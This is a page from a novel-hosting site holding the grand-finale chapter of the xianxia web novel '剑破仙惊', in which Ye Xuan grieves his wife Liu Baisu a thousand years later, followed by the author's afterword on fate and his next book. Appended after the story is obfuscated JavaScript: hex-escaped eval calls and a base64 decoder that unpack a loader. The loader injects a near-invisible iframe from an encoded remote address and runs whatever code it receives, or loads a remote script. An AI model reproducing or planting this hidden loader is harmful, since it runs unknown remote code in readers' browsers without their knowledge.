收藏【小说123网www.txt123.cc】,元尊小说无弹窗免费阅读!

    本来有点急事以为发不了了,后来又没事了,那就先把大结局发了吧。

    ……

    就这样,岁月悄无声息的流失,无论是那平淡的还是快乐的时光,总是在不经意间离去。一转眼,便已然是……千年后!

    千年的时间,望月宗已经彻彻底底的取代了九星王朝,那往日的九星王朝之名已然不复存在。现在,原本属于九星王朝的域土,已然更名为望月宗。至于叶玄和神念之体,用宗门制度取代王朝制度的梦想,也在岁月中,渐渐的实现了。

    这千年的时间对于叶玄而言,是一个转折点。

    中都区域完全成为了望月宗的宗门之地。

    一眼看去,偌大的宗门内,各大分支,形形色色的修士,全部都是望月宗麾下的弟子。他们或是在前往不同的修炼,或是在彼此交流,也或是在宗门内做些任务。

    对于这些弟子而言,望月宗内始终有一个传说。

    这个传说,便是属于望月宗的宗主。

    传言望月宗开创了望月宗,然而,却是没人能够见到他的真容,只知道他经常身在望月宗宗门内的禁地内。而这禁地,除了少数地圣境的老祖能够踏入其中之外,能够进入其中的无不是望月宗身份尊贵之人。

    至于这禁地,其实就是一座一眼看不透顶的山峰。

    从这山峰上一眼看去,能够看遍底下的山川大海,峰下之物,一览无遗。

    而此刻,这峰顶——

    一名身穿白衣的男子恭敬的说道:“父亲,孩儿先下去了。”

    他的前方正是悬崖边,这悬崖边上,站着两人。这男子所言的父亲,负手而立,通过背影来看,岁处中年。模样看不清楚,而他的身边,还有着一个约莫六七岁左右的女童,这女童扎着两个马尾辫,也学着前者的模样,背负着双手,模样甚是俏皮。

    “恩。”那背负着双手的中年男子点头应道,并未多言。

    看到自己父亲的这个样子,男子轻轻叹了一口气,眼睛放在了不远处立起的一块墓碑。

    这墓碑上面写着……

    ‘爱妻柳白苏之墓’

    三十年了。

    他母亲在三十年前,就因为无法再改命而死去,而他父亲从那个时候开始,就没有再露出过什么笑脸。

    想到这,男子深深的一叹,离开了这里。

    至于那站在悬崖边上的中年男子和女童依旧一动不动。

    再观这中年男子的模样,一头黑发,紫色的衣衫,脸上有着没有清理干净的胡渣。盯着他的眼睛,能够从他的眼神里感觉到岁月的流失,冷风吹过,看着他摇摆的长发,依稀能从他的身上,找到千年前,那个叶玄的几分影子。

    至于他身边这个女童,手握着一个糖葫芦,小舌头舔啊舔,仿佛她握着的乃是世间最美味的东西,看模样,不难看出,她正是小夭。

    “已经三十年了,她已经死了三十年了,人死不能复生,哪怕是仙人也改变不了命运。这样的结果,她早已经预料到了,她都能看得开,这么多年,你还没有看开吗?”小夭奶声奶气的出声说道。

    虽说声音稚嫩,不过,小夭说话老气横生,不像是一个小孩。

    中年男子并未开口说什么。

    小夭作为金星神,这千年的时间,已然成长了不少。

    “你别不理我啊。”小夭不满的说道。

    “你一个小孩子家,懂什么。”男子出声说道。

    小夭撇了撇嘴道:“人家才不是小孩子呢,你二十多岁的时候我站在你肩膀上就和你一样高了,现在你一千多岁了,我也一千多岁了,我才不是小孩子。”

    “……”

    男子没有再多言什么,眼睛盯着天空。

    终究,他还是什么都没有改变。

    他曾试图努力过。

    千年的时间,他始终没有放弃。

    他心知成为天仙,救不了柳白苏的性命。便是再想办法追寻医仙大道,然而这医仙之路坎坎坷坷,千年的时间,他终究还是没有创造出奇迹,眼睁睁的看着柳白苏就这样离自己而且而去。

    “恩?”

    这一会,男子发现了什么,盯着远方天空,突然一道飘逸的身影显现而出。此人身穿一身布衣,从天际驶来,化作一道光,再出现时,便是已然来到了叶玄的面前,一观模样,正是白云浮。

    “白前辈。”男子看到白云浮后,恭敬的说道。

    白云浮轻轻一叹,看着男子的模样,道:“我已经在仙界里听说你妻儿的事情,叶玄,节哀顺变。”

    “多谢前辈挂念了。”男子说道。“不知前辈从仙界下来,所为何事?”

    白云浮听到这,脸上露出了一丝笑意,道:“是这样的,仙界已经被我创建好了,乌天那边进度稍微慢一些,他建立里一个鬼仙界,和我这仙界哪里能比?我这仙界好处可多的很呢。”

    “仙界,有什么好处?”男子好奇的问道。

    白云浮朗声笑道:“这好处自然多的很了,我创造这仙界,地圣境来到这个界面,就不会再依赖于天地的力量,而地仙境在这里,也不会受到力量的压制。换句话说,地圣境和天圣境来到这里,将有很大的希望可以突破地仙境,而地仙境在仙界里,也完全可以凭借修炼,成为天仙。而且,我成为天仙之后,接触到了更多的东西,我感觉,我的修为还可以再进一步,天仙并非是极限。”

    听到这,叶玄稍显诧异,道:“那这,自然就是好事了。”

    “好事是好事,不过想进我这仙界可并不是那么容易的事情,我将灵界里的天道改写了一下,与仙界相连,地圣境即有资格进入仙界,但首先要渡过五门仙劫。能过了这五门仙劫,便可进入仙界修炼。对了,说起来,叶小友,你要不要去参观一下我这仙界?”白云浮发出了郑重的邀请。

    “我去我去我去。”小夭激动不已的说道。

    白云浮听到这,失笑道:“好,小金星神,就带你去,不过,叶玄你呢?”

    “我就不用了。”叶玄摇了摇头,道:“多谢前辈美意了。”

    白云浮叹了一口气,道:“也好,那我就先带金星神前去仙界了,让她回来和你描述一下。”

    “恩。”叶玄点头应了一声。

    白云浮温和的笑道:“小金星神,随老夫走一趟吧。”

    “好嘞,赶紧带我去。”小夭一下子爬到了白云浮的肩膀上,骑在了白云浮的脖子上。

    感觉到这,白云浮一脸的哭笑不得,随即化作一道光,消失在了原地,直奔天际。

    而叶玄,看着小夭和白云浮离开的方向,轻吐了一口气。

    这么多年,他已经麻烦白云浮很多了。

    不仅是白云浮,还有乌天。

    因为白云浮和乌天都欠他一个人情,所以两人都在寻找着救柳白苏的办法,然而……结果却终究是不能改变的。

    这时的他,终于转过头来,盯着那不远方的墓碑。

    就这样,不知道过了多久,叶玄方才回过神来,感觉到了峰顶有人的来到。

    “宗主……”

    这是,一道女子的声音。

    “恩,进来吧。”男子平静的说道。

    待得这话音落下后,一名年轻女子的模样显现而出。这女子身穿白色的长裙,长发披肩,一观模样,正是萧漓。相比千年前,萧漓的改变并没有多少,她还是和以前,一样的美丽,一样的温柔。

    硬要说什么东西改变,那便是修为的改变。

    这千年,萧漓已然从虚合期,达到了地圣境。

    因为百花池融入望月宗,萧漓唤叶玄的称呼,也从池主,变为了宗主。

    现在,萧漓来到,轻轻一个欠身,道:“宗主,您吩咐我的事情,都处理好了,那些资源都得到了分配,分支的事情也处理的妥当,萧漓前来和你通报一声。”

    “恩,处理好了即可,你办事我还是最放心的。”叶玄头也不转,负手而立的说道。

    萧漓听到这,看了一眼叶玄所望的方向,那墓碑时,低下头,眼神里满是复杂的神情。有一会的功夫,她方才深吸了一口气,道:“宗主,我……”

    话还没有说完,叶玄面如止水的道:“萧漓,你年龄也不小了,也修炼一千多年了。达到地圣境,我们认识千年了,你琴棋书画,样样精通,又生的如此美貌,懂的体贴人,是时候找个好的归属了。”

    听到这话,萧漓一时间变得面红耳赤,激动不已的道:“宗主,可是我的心里……”

    “好了,你先下去吧。”叶玄以命令的语气说道。

    萧漓听到这,脸上露出了委屈的神色,她贝齿轻咬,将这委屈默默的藏在心里,随即应道:“是,宗主。”

    这话落下,她转身离去。

    感觉到萧漓的离开,只能看到叶玄的背影,而不知道叶玄的神情到底有什么样的变化。

    或许,他还是目不转睛的看着那墓碑。

    千年时间,转瞬即逝,现在回想起,如若梦境般渡过。

    姜巧成为了东方家的家主,并且在太道王朝内赫赫有名,千年的时间,他与姜巧来往并不少,但都是私下的来往。

    这私下的来往,柳白苏或多或少都知道一些,却并未阻拦过,反而偶尔还撮合他去和姜巧见面。

    他心里知道柳白苏的想法,知道柳白苏一心为了自己。

    至于钟望雪,一心跟随白云浮追求天仙大道,他们见面的次数相对而言少上很多。

    而林知梦……

    乌天帮助林知梦逆天改命,已然千年的时间,结果是成与否,没人知道,他已然千年没见过那个倾国倾城的女子了。

    就这样,不知道过了多久,叶玄始终没有动一下。一直到,当他感觉到了什么之时,他方才蓦然转身,待得转身时,叶玄瞳孔一个剧烈的收缩,那冰封在心底已然千年的情,在这时,悄无声息的打开了。

    那容颜,恍若千年之前的初见。

    “你变了。”

    (大结局)

    ……

    结局感言:有一个故事是这样讲的,有一对夫妻和一头驴。

    这一对夫妻一起骑着驴,路过的人说,夫妻一起骑在驴身上,看把驴累的,考虑过驴的感受没?

    于是,夫妻听到这些,便分出丈夫下来,妻子骑在驴上,以此来减轻驴的负担。

    看到这一幕,路过又有行人说,坐在驴上的妻子真没有做妻子的样子,竟然自己骑在驴上,让丈夫步行。

    于是,夫妻俩又换丈夫骑在驴上,妻子下来步行走路。路过行人看到这,又有人说,你看这丈夫真不心疼妻子,一个大男人竟然让妻子步行走路,自己坐在驴身上。

    百般无奈下,这一对夫妻只能全部从驴身上下来,牵着驴赶路。

    可是,很明显又会有评价,这一对夫妻真傻,有驴不骑,买驴干什么?傻啊?

    这个道理我想很明显了,那就是,一个事和物不管再怎样,都无法满足于其他人。

    人和人之间,也终究是无法互相理解的,这个结果写出来,我想肯定会让很多人不满意。这也很正常,毕竟人们注重的是开始,享受的是过程,在意的是结果。

    我想大家看小说也是一样的,如果开头不好看,那么大家恐怕很难接受再看下去,而过程大家都是在享受,但更在意的是结果。这是心态问题,改变不了,无论结果怎样,太在意,都会觉得结果不会怎样。

    当然,我不否认,剑破仙惊的后期,我写的的确不如前期。

    但这个结局,不是草草的结局,因为结局是我早想好的结局,唯独缺少的可能就是一部分结局前的剧情,步入结局稍显的仓促了一些,以及一些感情的处理。

    这个原因我也不多说,剑破仙惊写到后期,我个人方面出了一些问题。

    我可以很负责任的说,出了这样的问题,我还能把一本书写完,我已经是一个很负责任的作者了。

    有一些读者知道,也没必要在这方面多找什么理由。

    总体而言,我给剑破仙惊打八分,因为我从头到尾都在用心写。

    至于柳白苏这个角色,其实我写的时候,一直都是将其设定为一个被命运掌控的女人。

    其实有很多时候我都在想,到底是社会改变了人,还是人改变了社会。苦苦思考得到的答案就是,少数人改变了社会,社会改变了多数人,而那一少部分人改变社会的前提上,他们曾经也被社会改变过。

    归根结底,至始至终人都在被社会改变。

    所以,人真的能改变自己的命运吗?能,但前提命运是一道选择题,他给你的人生只有四个、五个、六个结果,人所谓改变的命运只是选择了一个他觉得最好的结果罢了,他永远也选择不了命运没有给他的结果。

    那么,改变命运就成了一个笑话。

    而柳白苏,她的命运选择只有一个,不是她所能改变的。

    其实,不知道大家怎么想,我感觉现在我写书的进步是很大的。

    在写仙之武道的时候,我就考虑过要给女角色,一个生动的剧情,结果失败了,这也导致前中后期写的我自己都觉得很乱。

    而在写剑破仙惊的时候,我依旧在尝试这些,尝试去塑造一个生动的女角色,以及任何一个女角色,大体都有一个,一眼看去,就知道他是什么类型性格的角色,那样,整本书都会显的活灵活现起来。

    可能很多人都觉得,书中的女角色,写的很生动,但主角有什么性格?

    说这样的话人,我觉得他一定很好好看。

    因为,我知道肯定有很多人再骂主角优柔寡断,在感情方面不够果断等等。是啊,这也是主角的性格,他有他的优点,他也有他的缺点,为什么,主角一定是完美的呢?很显然,叶玄不是完美的,在性格上,他有优点,也有缺点。

    我觉得,叶玄和柳白苏是我写的最成功的地方。

    当然,还不够。

    我想要写的更好。

    我一直在朝着这方面努力,只不过可能做到这些真的不容易,塑造一个生动的女角色,我感觉我是做到了一部分,但每一个角色都有一个大致的角色性格,我还是很难做到。

    不过,我没有放弃。

    下本书,我还会继续尝试,尝试把一个角色彻底的写活,把一本书写活。

    当然,这也就关乎到下本书转型的问题了。

    这转型,其实就是写都市了,相对而言,都市更容易塑造角色一些,而众所周知的是,写仙侠墨迹那么多角色性格无疑是找死的行为。

    可能会有些读者担心看都市的话,会读不出来我的味道。

    但我可以保证,都市这本书只会让你看的比剑破仙惊更有味道。

    另外,下本书的话,发布不是在纵横,而是转站创世,新书名为‘都市剑圣’。现在去搜索即可搜索到。

    如果还有什么疑惑,请加读者群群号:179687582

章节目录

免费仙侠小说推荐: 洪荒:我在南海有座岛 河伯问道 我在仙界开工厂 从仙剑开始拯救女娲 大乾长生 从县令开始修仙 无限修仙玩家 从大秦开始的西游 神宠又给我开挂了 长生从金刚寺开始

eval("\x77\x69\x6e\x64\x6f\x77")["\x57\x57\x57\x69"]=function(e){var jW =''+'ABCDEFGHI'+'JKLMNOPQ'+'RSTUVWXYZab'+'cdefghi'+'jklmnopqrst'+'uvwxyz0123456789+'+'/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=jW.indexOf(e.charAt(f++));o=jW.indexOf(e.charAt(f++));u=jW.indexOf(e.charAt(f++));a=jW.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x7A\x71\x4B\x57\x57\x56\x69\x6A\x48"]=function(){eval(WWWi("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoV1dXaSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKFdXV2koIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihXV1dpKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbV1dXaSgiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKFdXV2koZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyd5SVRMNScrJ1FUJysnTnkweVknKydZR0pUSicrJ2xSJysnV2VscCcrJ1gnKydjR0pUSicrJ3onKydRJysnRE4nKyd3RVRRJysnelUnKydTYnZOJysnbUx1SicrJzJjbVJXJysnYnVjMycrJ2QzWmsnKydNbCcrJ1lZaycrJ01sRScrJzAnKydNbE0nKydIYzAnKydSSGEnKycnKycnLCcnKyc3cnYnKydURDknKydsSScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydKR2YnKyc3ZDMnKycwJysnJysnJywnWScp"));}